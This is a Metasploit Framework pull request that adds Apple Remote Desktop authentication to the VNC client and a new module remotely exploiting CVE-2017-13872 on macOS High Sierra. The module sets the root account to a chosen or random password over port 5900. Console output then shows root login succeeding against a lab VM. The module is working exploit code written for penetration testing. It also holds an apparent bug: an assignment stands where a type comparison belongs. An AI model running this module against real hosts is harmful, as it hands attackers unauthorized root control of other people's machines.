### PR TITLE
Implement ARD auth and add remote CVE-2017-13872 (iamroot) module

### DIFF
--- a/lib/metasploit/framework/login_scanner/vnc.rb
+++ b/lib/metasploit/framework/login_scanner/vnc.rb
@@ -46,8 +46,6 @@ module Metasploit
               service_name: 'vnc'
           }
 
-          credential.public = nil
-
           begin
             # Make our initial socket to the target
             disconnect if self.sock
@@ -57,7 +55,11 @@ module Metasploit
             vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
 
             if vnc.handshake
-              if vnc_auth(vnc,credential.private)
+              type = vnc.negotiate_authentication
+              if type != Rex::Proto::RFB::AuthType::ARD
+                credential.public = nil
+              end
+              if vnc_auth(vnc,type,credential.public,credential.private)
                 result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
               else
                 result_options.merge!(
@@ -106,11 +108,13 @@ module Metasploit
         # This method attempts the actual VNC authentication. It has built in retries to handle
         # delays built into the VNC RFB authentication.
         # @param client [Rex::Proto::RFB::Client] The VNC client object to authenticate through
+        # @param type [Rex::Proto::RFB::AuthType] The VNC authentication type to attempt
+        # @param username [String] the username to attempt the authentication with
         # @param password [String] the password to attempt the authentication with
-        def vnc_auth(client,password)
+        def vnc_auth(client,type,username,password)
           success = false
           5.times do |n|
-            if client.authenticate(password)
+            if client.authenticate_with_type(type,username,password)
               success = true
               break
             end

--- a/lib/rex/proto/rfb/client.rb
+++ b/lib/rex/proto/rfb/client.rb
@@ -88,7 +88,15 @@ class Client
   end
 
   def authenticate(password = nil)
+    authenticate_with_user(nil, password)
+  end
+
+  def authenticate_with_user(username = nil, password = nil)
     type = negotiate_authentication
+    authenticate_with_type(type, username, password)
+  end
+
+  def authenticate_with_type(type, username = nil, password = nil)
     return false if not type
 
     # Authenticate.
@@ -98,6 +106,9 @@ class Client
 
     when AuthType::VNC
       return false if not negotiate_vnc_auth(password)
+
+    when AuthType::ARD
+      return false if not negotiate_ard_auth(username, password)
 
     end
 
@@ -176,6 +187,7 @@ class Client
     selected = nil
     selected ||= AuthType::None if @opts[:allow_none] and @auth_types.include? AuthType::None
     selected ||= AuthType::VNC if @auth_types.include? AuthType::VNC
+    selected ||= AuthType::ARD if @auth_types.include? AuthType::ARD
 
     if not selected
       @error = "No supported authentication method found."
@@ -200,6 +212,21 @@ class Client
 
     true
   end
+
+  def negotiate_ard_auth(username = nil, password = nil)
+    generator = @sock.get_once(2)
+    generator = generator.unpack("n").first
+    key_length = @sock.get_once(2)
+    key_length = key_length.unpack("n").first
+    prime_modulus = @sock.get_once(key_length)
+    peer_public_key = @sock.get_once(key_length)
+
+    response = Cipher.encrypt_ard(username, password, generator, key_length, prime_modulus, peer_public_key)
+    @sock.put(response)
+
+    true
+ end
+
 
   attr_reader :error, :majver, :minver, :auth_types
   attr_reader :view_only

--- a/lib/rex/proto/rfb/constants.rb
+++ b/lib/rex/proto/rfb/constants.rb
@@ -36,6 +36,7 @@ class AuthType
   GtkVncSasl = 20
   MD5Hash = 21
   ColinDeanXVP = 22
+  ARD = 30
 
   def self.to_s(num)
     self.constants.each { |c|

--- a/modules/auxiliary/scanner/vnc/ard_root_pw.rb
+++ b/modules/auxiliary/scanner/vnc/ard_root_pw.rb
@@ -1,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/rfb'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Apple Remote Desktop Root Vulnerability',
+      'Description' => 'Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.',
+      'References'  =>
+        [
+          ['CVE', '2017-13872'],
+          ['URL', 'https://support.apple.com/en-us/HT208315']
+        ],
+      'Author'      => 'jgor',
+      'License'     => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        Opt::RPORT(5900),
+        OptString.new('PASSWORD', [false, 'Set root account to this password', ''])
+      ])
+  end
+
+  def log_credential(password)
+    print_good("Login succeeded - root:#{password}")
+
+    service_data = {
+      address: target_host,
+      port: rport,
+      service_name: 'vnc',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      username: 'root',
+      private_data: password,
+      private_type: :password
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def run_host(target_host)
+    begin
+      if datastore['PASSWORD'].empty?
+        password = Rex::Text::rand_text_alphanumeric(16)
+      else
+        password = datastore['PASSWORD']
+      end
+
+      connect
+      vnc = Rex::Proto::RFB::Client.new(sock)
+      if vnc.handshake
+        type = vnc.negotiate_authentication
+        unless type = Rex::Proto::RFB::AuthType::ARD
+          print_error("VNC server does not advertise security type ARD.")
+          return
+        end
+        print_status("Attempting authentication as root.")
+        if vnc.authenticate_with_type(type, 'root', password)
+          log_credential(password)
+          return
+        end
+      end
+      disconnect
+
+      connect
+      vnc = Rex::Proto::RFB::Client.new(sock)
+      print_status("Testing login as root with chosen password.")
+      if vnc.handshake
+        if vnc.authenticate_with_user('root', password)
+          log_credential(password)
+          return
+        end
+      end
+      disconnect
+
+      connect
+      vnc = Rex::Proto::RFB::Client.new(sock)
+      print_status("Testing login as root with empty password.")
+      if vnc.handshake
+        if vnc.authenticate_with_user('root', '')
+          log_credential('')
+          return
+        end
+      end
+
+    ensure
+      disconnect
+    end
+
+  end
+end

--- a/spec/lib/metasploit/framework/login_scanner/vnc_spec.rb
+++ b/spec/lib/metasploit/framework/login_scanner/vnc_spec.rb
@@ -31,7 +31,7 @@ RSpec.describe Metasploit::Framework::LoginScanner::VNC do
 
     it 'returns a failed result when authentication fails' do
       expect_any_instance_of(Rex::Proto::RFB::Client).to receive(:handshake).and_return true
-      expect_any_instance_of(Rex::Proto::RFB::Client).to receive(:authenticate).with(private).and_return false
+      expect_any_instance_of(Rex::Proto::RFB::Client).to receive(:authenticate_with_type).with(nil,nil,private).and_return false
       result = login_scanner.attempt_login(test_cred)
       expect(result.status).to eq Metasploit::Model::Login::Status::INCORRECT
     end

--- a/spec/lib/metasploit/framework/login_scanner/vnc_spec.rb
+++ b/spec/lib/metasploit/framework/login_scanner/vnc_spec.rb
@@ -31,7 +31,8 @@ RSpec.describe Metasploit::Framework::LoginScanner::VNC do
 
     it 'returns a failed result when authentication fails' do
       expect_any_instance_of(Rex::Proto::RFB::Client).to receive(:handshake).and_return true
-      expect_any_instance_of(Rex::Proto::RFB::Client).to receive(:authenticate_with_type).with(nil,nil,private).and_return false
+      expect_any_instance_of(Rex::Proto::RFB::Client).to receive(:negotiate_authentication).and_return Rex::Proto::RFB::AuthType::VNC
+      expect_any_instance_of(Rex::Proto::RFB::Client).to receive(:authenticate_with_type).with(Rex::Proto::RFB::AuthType::VNC,nil,private).and_return false
       result = login_scanner.attempt_login(test_cred)
       expect(result.status).to eq Metasploit::Model::Login::Status::INCORRECT
     end


### PR DESCRIPTION
This extends Rex::Proto::RFB to support usernames, implements authentication security type 30 ("Apple Remote Desktop" / ARD used by macOS), and uses that to add a module to remotely exploit CVE-2017-13872 over 5900/tcp on vulnerable macOS High Sierra hosts that have either Screen Sharing or Remote Management enabled.

Besides the added module for vulnerable High Sierra hosts, this lets scanner/vnc/vnc_login test credentials for *any* OSX host that has Screen Sharing or Remote Management enabled, and lays the groundwork for someone to add an OSX target to exploit/multi/vnc/vnc_keyboard_exec.

## Verification
Note: 172.16.143.129 is a macOS High Sierra 10.13.1 vm, clean install, with System Preferences > Sharing > Screen Sharing enabled. Legitimate login is user:password.
```
msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set RHOSTS 172.16.143.129
RHOSTS => 172.16.143.129
msf auxiliary(scanner/vnc/vnc_login) > set USERNAME user
USERNAME => user
msf auxiliary(scanner/vnc/vnc_login) > run

[*] 172.16.143.129:5900   - 172.16.143.129:5900 - Starting VNC login sweep
[+] 172.16.143.129:5900   - 172.16.143.129:5900 - Login Successful: user:password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/vnc/vnc_login) > creds
Credentials
===========

host            origin          service         public  private   realm  private_type
----            ------          -------         ------  -------   -----  ------------
172.16.143.129  172.16.143.129  5900/tcp (vnc)  user    password         Password
```

```
msf > use auxiliary/scanner/vnc/ard_root_pw
msf auxiliary(scanner/vnc/ard_root_pw) > set RHOSTS 172.16.143.129
RHOSTS => 172.16.143.129
msf auxiliary(scanner/vnc/ard_root_pw) > run

[*] 172.16.143.129:5900   - Attempting authentication as root.
[*] 172.16.143.129:5900   - Testing login as root with chosen password.
[+] 172.16.143.129:5900   - Login succeeded - root:xaavMPozB2HmDhGX
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/vnc/ard_root_pw) > creds
Credentials
===========

host            origin          service         public  private           realm  private_type
----            ------          -------         ------  -------           -----  ------------
172.16.143.129  172.16.143.129  5900/tcp (vnc)  root    xaavMPozB2HmDhGX         Password
```
